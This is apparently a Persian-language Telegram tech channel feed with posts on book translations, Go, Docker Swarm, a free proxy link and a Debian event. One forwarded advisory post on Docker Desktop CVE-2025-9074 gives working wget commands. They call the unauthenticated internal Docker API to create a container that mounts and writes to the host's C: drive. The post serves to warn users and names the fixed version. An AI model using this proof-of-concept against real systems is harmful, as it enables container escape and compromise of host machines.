ss://Y2hhY2hhMjAtaWV0Zi1wb2x5MTMwNTphOEtLNGVnaVRaZmRJNGtxR1Y3eVpy@switcher-nick-croquet.freesocks.work:443/?outline=1&prefix=%16%03%01%00%C2%A8%01%01
شدوساکس ۹۰ روزه قابل استفاده بر روی تمامی کلاینت های v2ray
Byteforge / بایــت فورج 🛸
ss://Y2hhY2hhMjAtaWV0Zi1wb2x5MTMwNTphOEtLNGVnaVRaZmRJNGtxR1Y3eVpy@switcher-nick-croquet.freesocks.work:443/?outline=1&prefix=%16%03%01%00%C2%A8%01%01 شدوساکس ۹۰ روزه قابل استفاده بر روی تمامی کلاینت های v2ray
🌐 freesocks.org/docs/setup/
دریافت از لینک زیر
freesocks.org
Setup & Get Connected
This page tells you how to install and setup the Outline Client app.
❤🔥3
📘 Task Programming in C# and .NET
یه خبر خوب! 🎉
شروع کردم به ترجمهی این کتاب. که به صورت تخصصی وارد دنیای برنامهنویسی Task و async/await در #C و .NET میشه و منبع خیلی خوبی برای درک عمیق این مفاهیمه.
دو فصل هم ترجمه شده
لطفاً حمایت کنید.❤️
🔗 https://github.com/hheydarian/task-programming-in-csharp-dotnet-persian
یه خبر خوب! 🎉
شروع کردم به ترجمهی این کتاب. که به صورت تخصصی وارد دنیای برنامهنویسی Task و async/await در #C و .NET میشه و منبع خیلی خوبی برای درک عمیق این مفاهیمه.
دو فصل هم ترجمه شده
لطفاً حمایت کنید.❤️
🔗 https://github.com/hheydarian/task-programming-in-csharp-dotnet-persian
GitHub
GitHub - hheydarian/task-programming-in-csharp-dotnet-persian: Persian translation of "Task Programming in C# and .NET" by Vaskaran…
Persian translation of "Task Programming in C# and .NET" by Vaskaran Sarcar. - hheydarian/task-programming-in-csharp-dotnet-persian
❤🔥5🔥3🍾1
Forwarded from جادی | Jadi
چند وقت پیش دوستی با اجرا کردن یه ابزار مرسوم، فایلهای سرگردانی رو روی سرور من پیدا کرد. توی این ویدئو مفهوم رو توضیح می دم و ابزار رو نشون می دم.
https://youtu.be/pBY6Chqqy_c
https://youtu.be/pBY6Chqqy_c
YouTube
چطوری هک شدم؟ کشف مسیرهای مخفی روی هاست سایتها با ابزار فازینگ
گاهی مدیر سیستمها یا حتی برنامه نویسها با تکیه به اینکه «خب کسی که نمی دونه این ایجاست» فایل ها یا حتی مسیرهایی روی سرورهاشون می ذارن که اگر کسی بدونه، بهتره که نباشن (: در این موارد فازینگ به هکرها کمک می کنه که این دیتاها رو پیدا کنن. البته فازینگ به…
🔥3
https://github.com/hemansadeghi/Termify.git
ابذار کاربردی اضافه کنید رفقا 😁❤️
ابذار کاربردی اضافه کنید رفقا 😁❤️
#linux
#cli
#byteforge
@byteforge_chan 🛸
GitHub
GitHub - hemansadeghi/Termify: A curated and ever-growing list of awesome terminal-based CLI tools for developers, sysadmins, and…
A curated and ever-growing list of awesome terminal-based CLI tools for developers, sysadmins, and power users. Clean, fast, and productive. - hemansadeghi/Termify
❤🔥5
Forwarded from Linuxor ?
برای یادگیری زبان گو، اگه قبلا برنامه نویسی با زبان دیگه کردی حتما لازم نیست که بشینی ویدیو یا کتاب بخونی این کارتو راه میندازه توی هر دارکتوریش/فولدرش چند تا مثال از بخش های مختلف گو رو زده، کداش رو دونه دونه بردارید روی سیستم خودتون ران کنید هرجا چیز جدید دیدید برید اونو سرچ کنید یاد بگیرید
github.com/inancgumus/learngo
@Linuxor
github.com/inancgumus/learngo
@Linuxor
🔥3👏2
Linuxor ?
برای یادگیری زبان گو، اگه قبلا برنامه نویسی با زبان دیگه کردی حتما لازم نیست که بشینی ویدیو یا کتاب بخونی این کارتو راه میندازه توی هر دارکتوریش/فولدرش چند تا مثال از بخش های مختلف گو رو زده، کداش رو دونه دونه بردارید روی سیستم خودتون ران کنید هرجا چیز جدید…
رفقای دواپسی گلم 🙋♂
میدونم که بیشترتون با پایتون راحتید
ولی بلد بودن Go واقعا حالت یه فیچر با ارزش افزوده برای یه پروداکت رو داره برای شخص شما 👌
به جمله بندی منم گیر ندین برید گو یاد بگیرید مخصوصا بچه هایی که شاید وارد شرکت های cloud native بشن در آینده
میدونم که بیشترتون با پایتون راحتید
ولی بلد بودن Go واقعا حالت یه فیچر با ارزش افزوده برای یه پروداکت رو داره برای شخص شما 👌
به جمله بندی منم گیر ندین برید گو یاد بگیرید مخصوصا بچه هایی که شاید وارد شرکت های cloud native بشن در آینده
❤5🔥2
Forwarded from Hamed
📕 Clean Code in C#
یک خبر عالی! 🥳
ترجمه فارسی کامل کتاب #Clean Code in C نوشته Jason Alls بهصورت رسمی آماده شد! این کتاب یکی از منابع فوقالعاده برای یادگیری اصول کدنویسی تمیز، Refactoring و ارتقای کیفیت نرمافزار در #C بهحساب میاد.
همراهی و نظرات انگیزشی شما کلی انرژی و دلگرمی به این پروژه میده. ممنون از حمایتتون! ❤️
https://github.com/hheydarian/clean-code-in-csharp-persian
یک خبر عالی! 🥳
ترجمه فارسی کامل کتاب #Clean Code in C نوشته Jason Alls بهصورت رسمی آماده شد! این کتاب یکی از منابع فوقالعاده برای یادگیری اصول کدنویسی تمیز، Refactoring و ارتقای کیفیت نرمافزار در #C بهحساب میاد.
همراهی و نظرات انگیزشی شما کلی انرژی و دلگرمی به این پروژه میده. ممنون از حمایتتون! ❤️
https://github.com/hheydarian/clean-code-in-csharp-persian
GitHub
GitHub - hheydarian/clean-code-in-csharp-persian: Persian translation of the book Clean Code in C# by Jason Alls
Persian translation of the book Clean Code in C# by Jason Alls - hheydarian/clean-code-in-csharp-persian
🔥3❤1
Byteforge / بایــت فورج 🛸
📕 Clean Code in C# یک خبر عالی! 🥳 ترجمه فارسی کامل کتاب #Clean Code in C نوشته Jason Alls بهصورت رسمی آماده شد! این کتاب یکی از منابع فوقالعاده برای یادگیری اصول کدنویسی تمیز، Refactoring و ارتقای کیفیت نرمافزار در #C بهحساب میاد. همراهی و نظرات انگیزشی…
مثله همیشه حامد عزیز ی حرکت خفن زده ی سر به ریپو بزنید ❤️👌
Forwarded from RandRng
اگر از Docker Desktop استفاده میکنید حتما باید آپدیتش کنید؛ یک vulnerability سطح بالا توی نحوه پیادهسازی داره (آپدیت آخر مشکل رو حل کرده)
https://nvd.nist.gov/vuln/detail/CVE-2025-9074
این مورد باعث میشه با ۲ خط کد بشه تمام موارد امنیتی رو دور زد و به سیستم عامل اصلی دسترسی گرفت.
توی گزارش اصلی فقط ویندوز گفته شده (نمیدونم مک هم داره یا نه)
https://nvd.nist.gov/vuln/detail/CVE-2025-9074
این مورد باعث میشه با ۲ خط کد بشه تمام موارد امنیتی رو دور زد و به سیستم عامل اصلی دسترسی گرفت.
توی گزارش اصلی فقط ویندوز گفته شده (نمیدونم مک هم داره یا نه)
👏4
Forwarded from Xero Notes
🐋 آسیبپذیری CVE-2025-9074 در Docker Desktop
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
یک کانتینر جدید با دستور
📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
ttp://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم میتواند یک کانتینر جدید با دسترسیهای ویژه راهاندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم میکند.💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create
یک کانتینر جدید با دستور
echo pwned > /mnt/host_root/pwn.txt میسازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ میکند.📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
👍1🔥1
Byteforge / بایــت فورج 🛸
Looking for a book: Automating DevOps with GitLab CI/CD Pipelines: Build efficient CI/CD pipelines to verify, secure, and deploy your code using real-life examples
Automating_DevOps_with_GitLab_CICD_Pipelines_Build.pdf
27.2 MB
Automating DevOps with GitLab CI/CD Pipelines
Build efficient CI/CD pipelines to verify, secure, and deploy your code using real-life examples
Christopher Cowell, Nicholas Lotz & Chris Timberlake
Packt, 2023
Build efficient CI/CD pipelines to verify, secure, and deploy your code using real-life examples
Christopher Cowell, Nicholas Lotz & Chris Timberlake
Packt, 2023
#book
#devOps
#byteforge
@byteforge_chan 🛸
🔥3
ErfJab
با این وضعیت دلار، اگه سیستم دولوپرا خراب شه باید تغییر شغل بدن.
حقیقتا من این کانفیگ رو پارسال تابستون گرفتم 33 تومن الان باشه احتمالا یه 60تایی پیاده بشم
Core i5 12500H-16 core
32+8>>40 g ddr4 4800mhz
1T ssd nvme gen2
Gpu intel iris xe 8g share
🔥7👍2
Xero Notes
🐳 داکر سوارم (Docker Swarm): ارکستراسیون ساده و سریع برای کانتینرها داکر سوارم یک ابزار قدرتمند و سبک برای مدیریت و ارکستراسیون کانتینرهای داکر است که به شما امکان میدهد کانتینرهای خود را بهصورت خودکار، مقیاسپذیر و امن مدیریت کنید. این ابزار با سادگی و…
مطلبت خیلی خوب و خلاصهست 👌
ولییییی
یه نکتهای که جا افتاده اینه که Swarm دیگه عملاً توسط Docker بهطور جدی توسعه داده نمیشه،
و بیشتر در حالت maintenance mode قرار گرفته. همین باعث شده جامعهی کاربری و اکوسیستمش خیلی محدود بشه. در مقایسه با Kubernetes، مواردی مثل auto-healing، HPA (Horizontal Pod Autoscaler)، شبکهسازی پیشرفته (CNI)، و اکوسیستم ابزارهایی مثل Helm و Operatorها توی Swarm وجود ندارن.
مثالهایی که آوردی هم بیشتر دمدستی بودن. مثلاً برای یه نقد واقعی بهتر بود یه use-case عملیتر مثل دیپلوی یه اپ میکروسرویسی (frontend + backend + db) رو نشون بدی تا مقیاسپذیری و محدودیتهای Swarm بهتر دیده بشه.
همچنین بخش امنیت رو خوب پوشش دادی، اما از نظر observability (مانیتورینگ، لاگگیری، tracing) چیزی گفته نشده، در حالی که توی پروژههای واقعی خیلی مهمه. ابزارهایی مثل Prometheus، ELK یا حتی Docker Swarm Visualizer معمولاً باید بهش اضافه بشن.
خلاصه بگم: محتوا برای معرفی اولیه خیلی خوبه، ولی برای کسی که بخواد تصمیم فنی بگیره، لازمه ضعفها و محدودیتهای Swarm هم شفافتر گفته بشه تا یکطرفه نباشه.
ولییییی
یه نکتهای که جا افتاده اینه که Swarm دیگه عملاً توسط Docker بهطور جدی توسعه داده نمیشه،
و بیشتر در حالت maintenance mode قرار گرفته. همین باعث شده جامعهی کاربری و اکوسیستمش خیلی محدود بشه. در مقایسه با Kubernetes، مواردی مثل auto-healing، HPA (Horizontal Pod Autoscaler)، شبکهسازی پیشرفته (CNI)، و اکوسیستم ابزارهایی مثل Helm و Operatorها توی Swarm وجود ندارن.
مثالهایی که آوردی هم بیشتر دمدستی بودن. مثلاً برای یه نقد واقعی بهتر بود یه use-case عملیتر مثل دیپلوی یه اپ میکروسرویسی (frontend + backend + db) رو نشون بدی تا مقیاسپذیری و محدودیتهای Swarm بهتر دیده بشه.
همچنین بخش امنیت رو خوب پوشش دادی، اما از نظر observability (مانیتورینگ، لاگگیری، tracing) چیزی گفته نشده، در حالی که توی پروژههای واقعی خیلی مهمه. ابزارهایی مثل Prometheus، ELK یا حتی Docker Swarm Visualizer معمولاً باید بهش اضافه بشن.
خلاصه بگم: محتوا برای معرفی اولیه خیلی خوبه، ولی برای کسی که بخواد تصمیم فنی بگیره، لازمه ضعفها و محدودیتهای Swarm هم شفافتر گفته بشه تا یکطرفه نباشه.
#docker
#byteforge
@byteforge_chan 🛸
🔥1
https://github.com/hemansadeghi/glory-vscode-theme.git
چن ماه پیش همینجوری ساختمش
دوس داشتید یه تست بزنید
چن ماه پیش همینجوری ساختمش
دوس داشتید یه تست بزنید
GitHub
GitHub - hemansadeghi/glory-vscode-theme: Glory is a clean, modern, and visually pleasing theme for Visual Studio Code. Designed…
Glory is a clean, modern, and visually pleasing theme for Visual Studio Code. Designed with carefully selected colors, it aims to provide an enjoyable and comfortable coding experience — day or ni...
❤🔥3🔥1
Forwarded from دبیان فارسی
گروه کاربران ایرانی دبیان قصد دارد به مناسبت انتشار نگارش ۱۳ سیستمعامل دبیان رویداد یکروزهای شامل کنفرانس علمی، کارگاههای آموزشی و نمایشگاه برگزار کند.
هدف از این رویداد که بهانهای است برای گردهمایی و همرسانی دانش و تجربه میان اعضای جامعه نرمافزار آزاد ایران، تقدیر از زحمات توسعهدهندگان دبیان و سایر نرمافزارهای آزاد، معرّفی و تبیین ویژگیها و دستاوردهای نگارش جدید و ترویج فرهنگ آزادی نرمافزار است.
این رویداد فرصتی را برای تبادل دانش و تجربه میان شرکتکنندگان و جذب مشارکتکنندگان جدید و تقویت جامعهٔ محلی نرمافزارهای آزاد فراهم میکند.
از این رو از تمامی علاقهمندان به ارائه یا برگزاری کارگاه درخواست میشود عنوان ارائههای خود را به همراه توضیح به نشانی رایانامهٔ events روی debian.ir بفرستند.
هدف از این رویداد که بهانهای است برای گردهمایی و همرسانی دانش و تجربه میان اعضای جامعه نرمافزار آزاد ایران، تقدیر از زحمات توسعهدهندگان دبیان و سایر نرمافزارهای آزاد، معرّفی و تبیین ویژگیها و دستاوردهای نگارش جدید و ترویج فرهنگ آزادی نرمافزار است.
این رویداد فرصتی را برای تبادل دانش و تجربه میان شرکتکنندگان و جذب مشارکتکنندگان جدید و تقویت جامعهٔ محلی نرمافزارهای آزاد فراهم میکند.
از این رو از تمامی علاقهمندان به ارائه یا برگزاری کارگاه درخواست میشود عنوان ارائههای خود را به همراه توضیح به نشانی رایانامهٔ events روی debian.ir بفرستند.
❤🔥3
رفقا کسی اینجا دولینگو استفاده میکنه ؟
البته نسخه pro
البته نسخه pro
Anonymous Poll
73%
نه بابا
32%
اره استفاده میکنیم
👍1